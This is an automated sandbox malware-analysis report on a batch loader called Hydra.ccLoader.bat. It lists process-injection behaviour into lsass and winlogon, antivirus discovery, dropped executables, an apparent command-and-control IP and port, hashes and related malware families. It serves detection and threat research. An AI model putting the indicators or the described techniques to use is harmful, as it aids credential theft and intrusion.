Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1E8090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_000001CA7D1E8090
Source: dllhost.exeBinary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts131
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Obfuscated Files or Information
11
Input Capture
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Timestomp
LSASS Memory2
File and Directory Discovery
Remote Desktop Protocol11
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
1
Scheduled Task/Job
713
Process Injection
1
DLL Side-Loading
Security Account Manager133
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job
Login Hook1
Scheduled Task/Job
1
File Deletion
NTDS251
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
Network Logon ScriptNetwork Logon Script21
Masquerading
LSA Secrets2
Process Discovery
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Modify Registry
Cached Domain Credentials131
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
Virtualization/Sandbox Evasion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt713
Process Injection
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Hidden Files and Directories
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1573922 Sample: Hydra.ccLoader.bat Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 82 Suricata IDS alerts for network traffic 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 .NET source code references suspicious native API functions 2->86 88 7 other signatures 2->88 10 cmd.exe 1 2->10         started        process3 signatures4 110 Suspicious powershell command line found 10->110 112 Suspicious command line found 10->112 13 powershell.exe 3 30 10->13         started        16 WMIC.exe 1 10->16         started        18 conhost.exe 10->18         started        20 2 other processes 10->20 process5 signatures6 114 Writes to foreign memory regions 13->114 116 Modifies the context of a thread in another process (thread injection) 13->116 118 Injects a PE file into a foreign processes 13->118 120 Powershell drops PE file 13->120 22 dllhost.exe 1 13->22         started        25 cmd.exe 1 13->25         started        27 cmd.exe 2 13->27         started        122 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 16->122 process7 file8 98 Contains functionality to inject code into remote processes 22->98 100 Writes to foreign memory regions 22->100 102 Creates a thread in another existing process (thread injection) 22->102 108 2 other signatures 22->108 30 winlogon.exe 22->30 injected 32 lsass.exe 22->32 injected 35 svchost.exe 22->35 injected 47 25 other processes 22->47 104 Suspicious powershell command line found 25->104 106 Suspicious command line found 25->106 37 powershell.exe 25->37         started        41 WMIC.exe 1 25->41         started        43 conhost.exe 25->43         started        49 2 other processes 25->49 64 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 27->64 dropped 45 conhost.exe 27->45         started        signatures9 process10 dnsIp11 51 dllhost.exe 30->51         started        54 svchost.exe 32->54 injected 72 System process connects to network (likely due to code injection or exploit) 35->72 66 135.125.21.87, 4782, 49816 AVAYAUS United States 37->66 68 ipwho.is 108.181.61.49, 443, 49828 ASN852CA Canada 37->68 62 C:\Windows\$nya-onimai2\MzWhoQ.exe, PE32+ 37->62 dropped 74 Writes to foreign memory regions 37->74 76 Modifies the context of a thread in another process (thread injection) 37->76 78 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->78 80 2 other signatures 37->80 70 ipwho.is 47->70 file12 signatures13 process14 signatures15 90 Injects code into the Windows Explorer (explorer.exe) 51->90 92 Writes to foreign memory regions 51->92 94 Creates a thread in another existing process (thread injection) 51->94 96 Injects a PE file into a foreign processes 51->96 56 svchost.exe 51->56 injected 58 svchost.exe 51->58 injected 60 spoolsv.exe 51->60 injected process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Hydra.ccLoader.bat0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Windows\$nya-onimai2\MzWhoQ.exe100%Joe Sandbox ML
C:\Windows\$nya-onimai2\MzWhoQ.exe5%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://excel.office.comSRD1%0%Avira URL Cloudsafe
https://outlook.comSRD1-0%Avira URL Cloudsafe
https://powerpoint.office.comSRD130%Avira URL Cloudsafe
https://excel.office.comcom0%Avira URL Cloudsafe
http://osoft.co_2010-06X0%Avira URL Cloudsafe
https://word.office.comSRD1#0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ipwho.is
108.181.61.49
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://ipwho.is/false
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
        high
        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          https://excel.office.comSRD1%svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1739512168.000002AE14142000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2843841020.000002AE14142000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://powerpoint.office.comSRD13svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835872307.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736450291.000002AE13E39000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore6xGpowershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      https://outlook.comSRD1-svchost.exe, 0000002D.00000000.1738511200.000002AE14044000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://osoft.co_2010-06Xdwm.exe, 0000000E.00000000.1544586967.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2878845130.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.ver)svchost.exe, 00000014.00000002.2863482747.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://excel.office.comcomsvchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://word.office.comSRD1#svchost.exe, 0000002D.00000002.2834764061.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736040592.000002AE13DD6000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://aka.ms/pscore6powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmp, Null.6.drfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/pscore68powershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://excel.office.comsvchost.exe, 0000002D.00000000.1737742822.000002AE13FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.1736219604.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.2835344258.000002AE13E0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000023.00000002.2814246539.0000026C03731000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      135.125.21.87
                                      unknownUnited States
                                      18676AVAYAUStrue
                                      108.181.61.49
                                      ipwho.isCanada
                                      852ASN852CAfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1573922
                                      Start date and time:2024-12-12 18:00:55 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 50s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:18
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:32
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Sample name:Hydra.ccLoader.bat
                                      Detection:MAL
                                      Classification:mal100.spyw.evad.winBAT@30/16@1/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 62
                                      • Number of non-executed functions: 331
                                      Cookbook Comments:
                                      • Found application associated with file extension: .bat
                                      • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 40.81.94.65, 2.22.50.144, 2.22.50.131, 40.126.53.18, 40.126.53.7, 40.126.53.19, 40.126.53.8, 20.190.181.5, 20.231.128.65, 40.126.53.15, 40.126.53.13, 13.107.246.63, 52.149.20.212
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: Hydra.ccLoader.bat
                                      TimeTypeDescription
                                      12:02:01API Interceptor2x Sleep call for process: WMIC.exe modified
                                      12:02:04API Interceptor836x Sleep call for process: powershell.exe modified
                                      12:02:23API Interceptor13777x Sleep call for process: svchost.exe modified
                                      12:02:45API Interceptor884108x Sleep call for process: winlogon.exe modified
                                      12:02:46API Interceptor67336x Sleep call for process: lsass.exe modified
                                      12:02:53API Interceptor726586x Sleep call for process: dwm.exe modified
                                      12:03:13API Interceptor98x Sleep call for process: spoolsv.exe modified
                                      12:03:14API Interceptor123x Sleep call for process: cmd.exe modified
                                      12:03:14API Interceptor113x Sleep call for process: conhost.exe modified
                                      12:03:20API Interceptor41x Sleep call for process: dllhost.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      108.181.61.49Cracker.exeGet hashmaliciousLuca StealerBrowse
                                      • /?output=json
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ipwho.isfull.exeGet hashmaliciousQuasarBrowse
                                      • 108.181.61.49
                                      https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                      • 108.181.61.49
                                      file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                      • 103.126.138.87
                                      TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                      • 103.126.138.87
                                      http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                      • 103.126.138.87
                                      file.exeGet hashmaliciousQuasarBrowse
                                      • 103.126.138.87
                                      file.exeGet hashmaliciousQuasarBrowse
                                      • 103.126.138.87
                                      ugjigghFzZ.exeGet hashmaliciousQuasarBrowse
                                      • 103.126.138.87
                                      http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                                      • 103.126.138.87
                                      http://womenluxuryfashion.comGet hashmaliciousTechSupportScamBrowse
                                      • 103.126.138.87
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ASN852CAfull.exeGet hashmaliciousQuasarBrowse
                                      • 108.181.61.49
                                      jew.sh4.elfGet hashmaliciousUnknownBrowse
                                      • 75.158.230.151
                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 198.166.177.229
                                      mips.elfGet hashmaliciousMiraiBrowse
                                      • 142.41.252.248
                                      https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                      • 108.181.61.49
                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                      • 108.181.189.7
                                      rebirth.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 206.116.110.1
                                      la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                      • 108.181.135.156
                                      la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                      • 142.82.198.6
                                      la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 173.180.89.128
                                      AVAYAUSjew.m68k.elfGet hashmaliciousUnknownBrowse
                                      • 135.67.118.37
                                      jew.mips.elfGet hashmaliciousUnknownBrowse
                                      • 135.79.60.160
                                      x86_64.elfGet hashmaliciousMiraiBrowse
                                      • 135.76.170.60
                                      Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                      • 135.125.81.94
                                      Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                      • 198.158.20.177
                                      Josho.mips.elfGet hashmaliciousUnknownBrowse
                                      • 198.158.115.255
                                      http://em.wdr.to/l/402850829367eb920193a7dbc0230e2fGet hashmaliciousUnknownBrowse
                                      • 135.125.161.45
                                      rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                      • 135.60.229.251
                                      la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                      • 135.58.215.147
                                      la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                      • 135.68.125.69
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0e4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      full.exeGet hashmaliciousQuasarBrowse
                                      • 108.181.61.49
                                      fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                      • 108.181.61.49
                                      4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                      • 108.181.61.49
                                      fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                      • 108.181.61.49
                                      3XSXmrEOw7.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      ozfqy8Ms6t.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      hCJ8gK9kNn.exeGet hashmaliciousRemcosBrowse
                                      • 108.181.61.49
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Windows\$nya-onimai2\MzWhoQ.exeNhoqAfkhHL.batGet hashmaliciousUnknownBrowse
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                        Category:dropped
                                        Size (bytes):71954
                                        Entropy (8bit):7.996617769952133
                                        Encrypted:true
                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                        Malicious:false
                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                        Category:dropped
                                        Size (bytes):7796
                                        Entropy (8bit):7.971943145771426
                                        Encrypted:false
                                        SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                        MD5:FB60E1AFE48764E6BF78719C07813D32
                                        SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                        SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                        SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                        Malicious:false
